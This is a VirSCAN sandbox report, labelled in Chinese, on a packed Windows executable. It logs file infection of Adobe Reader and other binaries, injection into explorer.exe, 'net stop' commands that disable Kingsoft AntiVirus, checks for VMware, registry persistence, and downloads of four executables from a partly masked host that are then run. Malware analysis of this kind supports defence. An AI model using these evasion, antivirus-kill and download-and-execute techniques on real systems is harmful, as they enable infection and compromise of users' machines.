VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:31
Behavior list
Basic Information
MD5:08642f705e58784564d5f8a7994f8def
file type:EXE
Production company:
version:1.0.0.0---1.0.0.0
Shell or compiler information:COMPILER:Upack 2.4 - 2.9 beta -> Dwing [Overlay]
Key behavior
Behavior description:修改原系统的EXE文件
details:C:\install.exe
C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe
C:\Program Files\e\e.exe
C:\Program Files\e\unins000.exe
Behavior description:跨进程写入数据
details:TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03550000, Size = 0x00000014
TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03540000, Size = 0x00000028
Behavior description:设置线程上下文
details:C:\WINDOWS\Logo1_.exe
Behavior description:杀掉进程
details:C:\WINDOWS\system32\RavMon.exe
Behavior description:获取TickCount值
details:TickCount = 487640, SleepMilliseconds = 2000.
TickCount = 487656, SleepMilliseconds = 2000.
TickCount = 487671, SleepMilliseconds = 2000.
TickCount = 487765, SleepMilliseconds = 2000.
TickCount = 487859, SleepMilliseconds = 2000.
TickCount = 487890, SleepMilliseconds = 2000.
TickCount = 487906, SleepMilliseconds = 2000.
TickCount = 487953, SleepMilliseconds = 2000.
TickCount = 506296, SleepMilliseconds = 20000.
TickCount = 506718, SleepMilliseconds = 20000.
TickCount = 506765, SleepMilliseconds = 20000.
TickCount = 507303, SleepMilliseconds = 100.
Behavior description:查找文件方式探测虚拟机
details:FindFirstFileEx: FileName = C:\Program Files\VMware\_desktop.ini
FindFirstFileEx: FileName = C:\Program Files\VMware\*.exe
FindFirstFileEx: FileName = C:\Program Files\VMware\*.*
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = , CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a3.bat
ImagePath = , CmdLine = net stop "Kingsoft AntiVirus Service"
Behavior description:跨进程写入数据
details:TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03550000, Size = 0x00000014
TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03540000, Size = 0x00000028
Behavior description:创建新文件进程
details:ImagePath = C:\WINDOWS\Logo1_.exe, CmdLine = C:\WINDOWS\Logo1_.exe
Behavior description:创建进程
details:ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a3.bat
ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net stop "Kingsoft AntiVirus Service"
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 stop "Kingsoft AntiVirus Service"
Behavior description:设置线程上下文
details:C:\WINDOWS\Logo1_.exe
Behavior description:枚举进程
details:N/A
Behavior description:杀掉进程
details:C:\WINDOWS\system32\RavMon.exe
Behavior description:创建本地线程
details:TargetProcess: Logo1_.exe, InheritedFromPID = 632, ProcessID = 1160, ThreadID = 1372, StartAddress = 0040ABE4, Parameter = 00000000
TargetProcess: Logo1_.exe, InheritedFromPID = 632, ProcessID = 1160, ThreadID = 784, StartAddress = 0040AD40, Parameter = 00000000
TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 564, StartAddress = 03564238, Parameter = 00000000
TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 1880, StartAddress = 6302B849, Parameter = 000DE9C0
TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 2760, StartAddress = 769AE43B, Parameter = 00100008
Behavior description:创建下载文件进程
details:ImagePath = C:\WINDOWS\0Sy.exe, CmdLine = C:\WINDOWS\0Sy.exe
ImagePath = C:\WINDOWS\1Sy.exe, CmdLine = C:\WINDOWS\1Sy.exe
ImagePath = C:\WINDOWS\2Sy.exe, CmdLine = C:\WINDOWS\2Sy.exe
ImagePath = C:\WINDOWS\3Sy.exe, CmdLine = C:\WINDOWS\3Sy.exe
File behavior
Behavior description:创建文件
details:C:\WINDOWS\rundl132.exe
Behavior description:修改原系统的EXE文件
details:C:\install.exe
C:\222c25ed\IE8-Setup-Full\installservices.exe
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe
C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe
C:\Program Files\e\e.exe
C:\Program Files\e\unins000.exe
Behavior description:创建可执行文件
details:C:\WINDOWS\rundl132.exe
C:\WINDOWS\Logo1_.exe
Behavior description:覆盖已有文件
details:C:\WINDOWS\rundl132.exe
C:\1.txt
Behavior description:查找文件
details:FileName = C:\WINDOWS\rundl132.exe
Behavior description:删除文件
details:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\wpad[1].dat
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlms[1].txt
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlms[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlgt[1].txt
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlgt[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlzt[1].txt
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlzt[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlfz[1].txt
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlfz[1].exe
Behavior description:修改BAT脚本文件
details:C:\Documents and Settings\Administrator\Local Settings\Temp\$$a3.bat ---> Offset = 0
Behavior description:修改文件内容
details:C:\WINDOWS\rundl132.exe ---> Offset = 0
C:\WINDOWS\Logo1_.exe ---> Offset = 0
Network behavior
Behavior description:联网打开网址
details:InternetOpenUrlA: http://**.133.40.**:128/wpad.dat, hInternet = 0x00cc0010, Flags = 0x00000010
Behavior description:下载文件
details:URLDownloadToFileW: http://ww****om/sysdl/dlms.txt ---> c:\1.txt
C:\1.txt
URLDownloadToFileW: http://ww****om/sysdl/dlms.exe ---> C:\WINDOWS\0Sy.exe
C:\WINDOWS\0Sy.exe
URLDownloadToFileW: http://ww****om/sysdl/dlgt.txt ---> c:\1.txt
URLDownloadToFileW: http://ww****om/sysdl/dlgt.exe ---> C:\WINDOWS\1Sy.exe
C:\WINDOWS\1Sy.exe
URLDownloadToFileW: http://ww****om/sysdl/dlzt.txt ---> c:\1.txt
URLDownloadToFileW: http://ww****om/sysdl/dlzt.exe ---> C:\WINDOWS\2Sy.exe
C:\WINDOWS\2Sy.exe
URLDownloadToFileW: http://ww****om/sysdl/dlfz.txt ---> c:\1.txt
URLDownloadToFileW: http://ww****om/sysdl/dlfz.exe ---> C:\WINDOWS\3Sy.exe
C:\WINDOWS\3Sy.exe
Behavior description:连接指定站点
details:InternetConnectA: ServerName = ww****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.133.40.**, PORT = 128, UserName = , Password = , hSession = 0x00cc0010, hConnect = 0x00cc0014, Flags = 0x00000010
Behavior description:打开HTTP连接
details:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004
InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0), hSession = 0x00cc0010
Behavior description:建立到一个指定的套接字连接
details:URL: wpad, IP: **.133.40.**:128, SOCKET = 0x000007b0
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007b4
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007c8
URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007cc
Behavior description:读取网络文件
details:hFile = 0x00cc0018, BytesToRead =4010, BytesRead = 4010.
hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048.
Behavior description:发送HTTP包
details:GET /wpad.dat HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0) Host: **.133.40.**:128
GET /sysdl/dlms.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlms.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlgt.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlgt.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlzt.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlzt.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlfz.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
GET /sysdl/dlfz.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive
Behavior description:打开HTTP请求
details:HttpOpenRequestA: ww****om:80/sysdl/dlms.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: **.133.40.**:128/wpad.dat, hConnect = 0x00cc0014, hRequest = 0x00cc0018, Verb: GET, Referer: , Flags = 0x00000010
HttpOpenRequestA: ww****om:80/sysdl/dlms.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlgt.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlgt.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlzt.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlzt.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlfz.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
HttpOpenRequestA: ww****om:80/sysdl/dlfz.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010
Behavior description:按名称获取主机地址
details:gethostbyname: computer
GetAddrInfoW: computer
GetAddrInfoW: wpad
GetAddrInfoW: ww****om
Registry behavior
Behavior description:修改注册表
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
\REGISTRY\MACHINE\SOFTWARE\Soft\DownloadWWW\auto
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down0
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\0Sy.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down1
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\1Sy.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down2
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\2Sy.exe
Behavior description:删除注册表键值
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
RasPbFile
MSCTF.Shared.MUTEX.APH
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
MSCTF.Shared.MUTEX.ELH
MSCTF.Shared.MUTEX.IH
MSCTF.Shared.MUTEX.EOC
Behavior description:枚举网络共享资源
details:N/A
Behavior description:创建事件对象
details:EventName = CTF.ThreadMarshalInterfaceEvent.000007B4.00000000.00000013
EventName = CTF.ThreadMIConnectionEvent.000007B4.00000000.00000013
EventName = MSCTF.SendReceive.Event.ELH.IC
EventName = MSCTF.SendReceiveConection.Event.ELH.IC
EventName = MSCTF.SendReceive.Event.IH.IC
EventName = MSCTF.SendReceiveConection.Event.IH.IC
EventName = MSCTF.SendReceive.Event.MJH.IC
EventName = MSCTF.SendReceiveConection.Event.MJH.IC
EventName = CTF.ThreadMarshalInterfaceEvent.000007B4.00000000.00000014
EventName = CTF.ThreadMIConnectionEvent.000007B4.00000000.00000014
Behavior description:查找指定窗口
details:NtUserFindWindowEx: [Class,Window] = [RavMonClass,RavMon.exe]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Behavior description:获取TickCount值
details:TickCount = 487640, SleepMilliseconds = 2000.
TickCount = 487656, SleepMilliseconds = 2000.
TickCount = 487671, SleepMilliseconds = 2000.
TickCount = 487765, SleepMilliseconds = 2000.
TickCount = 487859, SleepMilliseconds = 2000.
TickCount = 487890, SleepMilliseconds = 2000.
TickCount = 487906, SleepMilliseconds = 2000.
TickCount = 487953, SleepMilliseconds = 2000.
TickCount = 506296, SleepMilliseconds = 20000.
TickCount = 506718, SleepMilliseconds = 20000.
TickCount = 506765, SleepMilliseconds = 20000.
TickCount = 507303, SleepMilliseconds = 100.
Behavior description:调整进程token权限
details:SE_LOAD_DRIVER_PRIVILEGE
Behavior description:枚举窗口
details:N/A
Behavior description:修改后的可执行文件签名信息
details:C:\install.exe(签名验证: 未通过)
C:\222c25ed\IE8-Setup-Full\installservices.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe(签名验证: 未通过)
C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe(签名验证: 未通过)
C:\Program Files\e\e.exe(签名验证: 未通过)
C:\Program Files\e\unins000.exe(签名验证: 未通过)
Behavior description:可执行文件签名信息
details:C:\WINDOWS\rundl132.exe(签名验证: 未通过)
C:\WINDOWS\Logo1_.exe(签名验证: 未通过)
Behavior description:调用Sleep函数
details:[1]: MilliSeconds = 2000.
[2]: MilliSeconds = 20000.
[3]: MilliSeconds = 100.
[4]: MilliSeconds = 100.
[5]: MilliSeconds = 100.
[6]: MilliSeconds = 100.
[7]: MilliSeconds = 100.
[8]: MilliSeconds = 100.
[9]: MilliSeconds = 100.
[10]: MilliSeconds = 20000.
Behavior description:可执行文件MD5
details:C:\WINDOWS\rundl132.exe ---> f75e81aa8aa132c4a108ea88293b912c
C:\WINDOWS\Logo1_.exe ---> f75e81aa8aa132c4a108ea88293b912c
Behavior description:修改后的可执行文件MD5
details:C:\install.exe ---> b2291e1127a49e78b850b17d6a443cd9
C:\222c25ed\IE8-Setup-Full\installservices.exe ---> 125e121c055430d9e2d4530b7062f1db
C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> 4dab014f966d3ca7fb02acda0d3bcce8
C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> 4a96f3cc0b0375621fcbfdb3153ed7b1
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 3227de1ba7167d8aef8c7ffe0d4f86d5
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 8f21bfc299c183e0e389808b471d24cb
C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> c0c6896f932ffb9bf8b6b814b0160dfb
C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 92b516d5cb5a00435c0f76b3fa9da7ae
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> 502a7e868b7e85fe2932b7ef4bf6a236
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> f326ae3393c560f6c6a45936aefaff67
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> 7028bf4e091a8f1ccf0e9cab6ce40384
C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe ---> f3bab6991c0a593dfdc1713ff50e3c47
C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe ---> 06058a91822219aad3f2685e9e2305e5
C:\Program Files\e\e.exe ---> fb26931cfdf6a80a85280915e465f1b7
C:\Program Files\e\unins000.exe ---> 68f8fc7f96cca4c9d69aa8253f5e9c93
Behavior description:加载新释放的文件
details:Image: C:\WINDOWS\vDll.dll.
Behavior description:查找文件方式探测虚拟机
details:FindFirstFileEx: FileName = C:\Program Files\VMware\_desktop.ini
FindFirstFileEx: FileName = C:\Program Files\VMware\*.exe
FindFirstFileEx: FileName = C:\Program Files\VMware\*.*
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
中国反网络病毒联盟
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号